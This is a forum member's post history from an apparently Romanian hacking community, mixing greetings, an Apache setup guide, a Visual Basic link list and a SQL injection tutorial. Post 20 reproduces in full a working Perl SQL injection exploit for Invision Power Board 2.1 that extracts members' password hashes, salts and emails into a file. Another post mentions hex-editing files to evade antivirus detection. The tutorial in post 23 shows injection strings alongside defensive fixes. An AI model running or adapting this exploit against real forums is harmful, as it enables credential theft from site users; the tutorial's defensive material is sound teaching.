Jump to content

ghici

Active Members
  • Posts

    258
  • Joined

  • Last visited

    Never

Everything posted by ghici

  1. 600mhz ! i don`t like games
  2. bun venit.am citit topicurile tale...bun inceput
  3. pacat ca e facut de un tampit...care e mare lamer..
  4. wlecome spor la posturi
  5. ghici

    hy all

    bun venit! enjoy
  6. impotriva floodului MASIV nu prea exista protectie ! dati seama te floodeaza 5000-6000 de drone cum le dai ban la toate? pan le proceseaza serveru pe toate dureaza ore intregi + dupa aia tot apar altele noi !
  7. nice...mersi
  8. ghici

    Sal

    bun venit !~ ma bucur ca-ti place ! incercam sa facem o comunitate mare de hacking
  9. am vb cu kw3rln si el o zis ca nu le da ban pe ip doar la user! si asta pote in cateva saptamani e doar asa sa faca si cei care se inregistreaza 2-3 posturi
  10. mai bine le citeai pe alea in romana
  11. trebuie sa facem si altceva..ceva mai maret.. ma gandeam ca punem fiecare idei aici vad ca amu kw3 lucra la news..download section, mai are putin online tools si mai gata eu ma gandeam sa facem un challenge section...unde sa punem incercari gen Hackthissite.com astept idei si de la voi
  12. hexing 5 minute si ii undetectabil .. sunt ceva tutoriale pe forum despre .. da un mic search
  13. mersi .. sa vedem ce poate
  14. dezactiveaza-ti antivirusu ..
  15. nice ... !_30 ne poti spune mai multe despre ipv6 pls
  16. nicee stuff ! MERSI !_30 ...
  17. ghici

    Sal All

    welcome
  18. extazy69 mie imi merge super zai dll ce lipseste
  19. nu da am lasat salieri pt ca el a facut postu pe alt forum
  20. #!/usr/bin/perl use LWP::UserAgent; $ua = LWP::UserAgent->new; &header(); if (@ARGV < 2) {&info(); exit();} $server = $ARGV[0]; $dir = $ARGV[1]; print "[+] SERVER {$server}rn"; print "[+] DIR {$dir}rn"; #Step 1, detecting vulnerability print "[1] Testing forum vulnerability..."; $q = "UNION SELECT 'VULN',1,1,1/*"; query($q,$server,$dir); if($rep =~/VULN/){ print "forum vulnerablern"; } else   {   print "forum unvulnerablern";  &footer();   exit();   } #Step 2, detecting prefix print "[2] Searching prefix..."; $q = ""; query($q,$server,$dir); $prefix = $rep; print $prefix."rn"; #Step 3, make query print "[3] Performing query; it may take several minutes, plz, wait...rn"; $q1 = "UNION SELECT MAX(converge_id),1,1,1 FROM ".$prefix."members_converge/*"; query($q1,$server,$dir); $kol = $rep; open(RES,">".$server."_result.txt"); for($id = 1; $id <= $kol; $id++)   {  $own_query = "UNION SELECT converge_pass_hash,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";   query($own_query,$server,$dir);   if($rep=~/[0-9a-f]{32}/i)   {    $hash = $rep;  $own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";     query($own_query,$server,$dir);     if(length($rep)==5)    {   $salt = $rep;   $own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";       query($own_query,$server,$dir);   if(length($rep)>0)    {   $email = $rep;   print RES $id.":".$hash.":".$salt."::".$email."n";    }  }   }   } close(RES); print "[!] Query was successfully perfomed. Results are in txt filesrn"; &footer(); $ex = <STDIN>; sub footer()   {   print "[G] Greets: 1dt.w0lf (rst/ghc)rn";   print "[L] Visit: secbun.info | damagelab.org | rst.void.rurn";   } sub header() { print q( ---------------------------------------------------------- * Invision Power Board 2.1.* Remote SQL Injecton Exploit * *    Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc)  * *         Coded by w4g.not null          * *        FOR EDUCATIONAL PURPOSES *ONLY*      * ---------------------------------------------------------- ); } sub info() { print q( [i] Usage: perl w4gipb216.pl [server] [/dir/]   where   |- server - server, where IPB installed without http://   |- /dir/ - dir, where IPB installed or / for no dir  e.g perl w4gipb216.pl someserver.com /forum/ [i] Stealing info about users (format id:pass:salt::email)  [!] Need MySQL > 4.0 ); } sub query()   {   my($q,$server,$dir) = @_;   $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q);   if($res->is_success)     {     $rep = '';     if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; }     else     {       if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; }       }     }   return $rep;   } # milw0rm.com [2006-07-18]
  21. Recomand versiunea apache_1.3.31.tar.gz, aceasta versiune te rog sa o pui direct in directorul /root tar -xzf apache_1.3.31.tar.gz ./configure --prefix=/usr/local/apache make make install cd /usr/local/apache/htdocs/ dupa care editezi /usr/local/apache/conf/httpd.conf... cauti : <IfModule mod_dir.c> DirectoryIndex index.html </IfModule> le faci sa seamane asa : <IfModule mod_dir.c> DirectoryIndex index.php index.html </IfModule> cauti : # And for PHP 4.x, use: # #AddType application/x-httpd-php .php #AddType application/x-httpd-php-source .phps adaugi sa arate asa : # And for PHP 4.x, use: # AddType application/x-httpd-php .php AddType application/x-httpd-php-source .phps ASTA IN CAZUL IN CARE DORESTI SA ITI RECUNOASCA SI PHP-UL dupa care salvezi httpd.conf ! si ca sa-l pornesti dai asa : linux:/usr/local/apache/htdocs# ../bin/apachectl start dupa care intrii in explorer si poti folosi -> http://www.your-site.com/ Pentru a gazdui mai multe site-uri editeaza din nou /usr/local/apache/conf/httpd.conf cauti : #NameVirtualHost * dupa care scoti # (diezu) fin fata liniei dupa care editezi : <VirtualHost *> ServerAdmin E-mail DocumentRoot /home/gnuworld/website/ ServerName yoursite.some-domain.com ErrorLog logs/yoursite.some-domain.com-error.log CustomLog logs/yoursite.some-domain.com-access.log common </VirtualHost> dupa care iar salvezi httpd.conf ! si dau restart la serviciu asa : /usr/local/apache/bin/apachectl restart
  22. Acest topic va contine numai linkuri catre resurse (tutoriale/carti/articole etc) pentru Visual Basic. Cine vrea sa contribuie este liber sa dea un reply aici. http://www.vbip.com/ http://www.vbtutor.net/ http://www.vbwire.com/ http://www.vbcode.com/ http://www.vbaccelerator.com/ http://www.devx.com/vb/ http://www.vbcodemagician.dk/ http://www.vbusers.com/home.asp - niste coduri sursa http://www.boondog.com/tutorials/dlltutor/dlltutor.htm http://www.codeguru.com/vb/ http://www.vbexplorer.com/ http://abstractvb.com/ http://www.devdos.com/vb/Visual_Basic.shtml http://www.wolfebyte.com/ http://www.tutorialized.com/tutorial/Wo ... Files/3765 http://www.profsr.com/vb/vbintro.htm - for beginners http://msdn.microsoft.com/library/defau ... vb04l4.asp http://www.profsr.com/vb/vbintro.htm - for Visual basic 6.0 http://www.planet-source-code.com/vb/sc ... p;lngWId=1 - pentru incepatori din aia n00bi http://www.cgi-interactive-uk.com/vb6_c ... mysql.html http://www.vbmysql.com/articles/crystalvbmysql.html greetz go to MIkE
  23. Tehnica SQL injection da posibilitatea unui atacator sa execute comenzi SQL neautorizate porfitand de oportunitati neortodoxe de intrare in aplicatiile web construind interogari SQL dinamice. Acesta devine posibil deoarece PHP combina sirurile interogarilor MYSQL pe care le setezi cu variabila inainte pentru ca cineva sa poata adauga o a doua interogare sau schimba interogarea ta pentru a le oferi informatii sau acces pe care nu ar trebui sa il aiba. Cele mai obisnuite dintre aceste intrari includ apostrofuri unescaped in declaratiile SQL. PROBLEMA Considerati urmatoarea interogare SQL in PHP: $result=mysql_query('SELECT * FROM users WHERE username="'.$_GET['username'].'"'); Interogarea selecteaza toate randurile din tabelul userilor unde username-ul este acelasi cu cel din sirul de interogari. Daca priviti cu atentie, veti realiza ca declaratia este vulnerabila la SQL injection - apostroful in $_GET['username'] nu sunt , si prin urmare nu vor fi cuprinse ca parte din declaratie, ceea ce permite un comportament defectuos. Ganditi-va ce s-ar intampla daca $_GET['username'] ar fi urmatorul: " OR 1 OR username = " (dublu apostrof, urmat de textualul " OR 1 OR username = " urmat de un alt dublu apostrof). Cuprins in expresia originala, interogarea devine urmatoarea: SELECT * FROM users WHERE username = "" OR 1 OR username = "". Altfel, un dublu apostrof va ramane la sfarsitul afirmatiei. Aceasta selecteaza toate sirurile din tabelul userilor. Desi nu pare periculos, alte coduri infectate pot fi adaugate, mai ales in interogarile DELETE sau UPDATE care modifica tabelul. De asemenea, un alt sir de coduri SQL poate fi adaugat la SELECT * FROM `users` WHERE username = '' adaugand un apostrof sau o semicoloana la sfarsit, astfel sirul devene SELECT * FROM `users` WHERE username = ''; ' care cu usurinta se transforma in SELECT * FROM `users` WHERE username = ''; DELETE * FROM `forum` WHERE title != '' SOLUTIA Niciodata sa nu aveti incredere in informatiile userului, procesati informatia numai dupa validare. De regula, aceasta se face prin pattern matching. In exemplul urmator, username-ul este restrictionat la caractere alfanumerice plus underscore si cu o lungime cuprinsa intre 8-20 caractere – modificati la nevoie. if (preg_match("/^w{8,20}$/", $_GET['username'], $matches)) $result = mysql_query("SELECT * FROM users WHERE username=$matches[0]"); else // we don't bother querying the database echo "username not accepted"; O buna practica in codare afirma ca apostrofurile duble ar trebuie folosite mereu in oricarei informatii variabile. Ori folosing slash dublu apostrof , ori apostrof simplu, cadrand intreaga interogatie, pentru ca tipul opus de interogatie sa nu trebuiasca escaped, desi acelasi tip de apostrof trebuie escaped. $result = mysql_query('SELECT * FROM users WHERE username = "$usern"'); or $result = mysql_query("SELECT * FROM users WHERE username = "$usern" "); Pentru o siguranta mai mare, renuntati la executarea scriptului inlocuind echo cu exit() or die(). Aceasta inca se mai aplica atunci cand se folosesc checkboxuri, butoane ratio, liste de selectie, etc. Orice browser cerut (chiar si POST) poate fi REPLICATED prin telnet, situri duplicate, javascript, sau codare(chiar si PHP), asadar intotdeauna trebuie sa fiti prevazatori in privinta restrictiilor pentru codarea aferenta clientului. Folosirea mysql_real_escape_string() PHP ofera o functie care se ocupa cu inserarea userului in MySQL, si aceea este mysql_real_escape_string(string unescaped_string[, resource link_identifier]). Acest script scapa de toate caracterele potential periculoase din sir si transforma sirul escaped intr-unul prudent pentru a fi folosit in sirul MySQL. (Functia originala, myqsl_escape_string, nu a luat in considerare caracterul curent pentru a iesi din sir, nici nu a acceptat argumentul conexiunii. Este dezaprobata inca de la PHP 4.3.0) Spre exemplu, luati urmatorul exemplu: $result=mysql_query('SELECT * FROM users WHERE username="'.$_GET['username'].'"'); Aceasta poate fi escaped dupa cum urmeaza: $result=mysql_query('SELECT * FROM users WHERE username="'.mysql_real_escape_string($_GET['username']).'"'); Astfel, daca userul a incercat sa insereze o alta declaratie in afara de DELETE, ar fi interpretat inofensiv ca o parte din parametrul clauza WHERE: SELECT * FROM `users` WHERE username = '';DELETE * FROM `forum` WHERE title != '' Backslashurile adaugate de mysql_real_escape_string face ca MySQL sa le interpreteze ai degraba ca si caractere cu un singur apostrof decat ca si parte din declaratia SQL. Luati la cunostinta cu MySQL nu permite multe interogari asadar DELETE FROM din tabel nu merge oricum.
×
×
  • Create New...